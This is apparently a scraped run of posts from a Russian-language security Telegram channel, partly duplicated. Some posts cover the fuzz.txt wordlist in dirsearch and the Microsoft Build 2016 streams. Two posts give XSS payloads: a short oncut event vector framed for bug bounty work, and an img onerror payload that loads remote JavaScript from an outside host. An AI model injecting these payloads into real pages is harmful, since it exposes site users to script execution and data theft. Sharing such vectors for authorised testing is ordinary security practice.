Кстати говоря, fuzz.txt (bo0om.ru/fuzz.txt) вошёл как дефолтный словарь в dirsearch.
https://github.com/maurosoria/dirsearch
Надо про него потом еще написать :)
https://github.com/maurosoria/dirsearch
Надо про него потом еще написать :)
GitHub
GitHub - Bo0oM/fuzz.txt: Potentially dangerous files
Potentially dangerous files. Contribute to Bo0oM/fuzz.txt development by creating an account on GitHub.
❤🔥1
https://channel9.msdn.com/Events/Build/Russian-Online-Translation-Build-2016?CR_CC=200771969
А тут трансляция. Только что запустили emacs из bash'а!
Да, в windows запилили BASH! BASH КАРЛ!
А тут трансляция. Только что запустили emacs из bash'а!
Да, в windows запилили BASH! BASH КАРЛ!
Channel 9
Build 2016 (русскоязычная трансляция) (Channel 9)
Конференция Build будет посвящена всем платформам Microsoft- вас ждет множество материалов и информации о Windows, Azure, Office 365 и других решениях. Три дня през
❤🔥1
Сегодня второй день Build'а, если кому интересно. Будут опять что-то презентовать и рассказывать про будущее MS.
Трансляция тут https://channel9.msdn.com/
Трансляция тут https://channel9.msdn.com/
Docs
Shows - Event & Video Content
Browse thousands of hours of video content from Microsoft. On-demand video, certification prep, past Microsoft events, and recurring series.
❤🔥1
Один из коротких векторов для выполнения JS при XSS атаке:
Событие
Эксплуатабельность низкая, но для bugbounty, когда жесткие ограничения на длину вектора - сойдёт.
<q/oncut=alert()>X
Событие
oncut сработает, если пользователь попытается вырезать содержимое, т.е. выделет текст и нажмет CTRL+X. Эксплуатабельность низкая, но для bugbounty, когда жесткие ограничения на длину вектора - сойдёт.
❤🔥1
А это более прикольная альтернатива alert'у
Хоть и боян
<img src onerror="(function(u){var d=document,s=d.createElement('scri'+'pt');s.src=u;(d.head||d.documentElement).appendChild(s);s.parentNode.removeChild(s);}('//bo0om.ru/xss.js'));">Хоть и боян
❤🔥1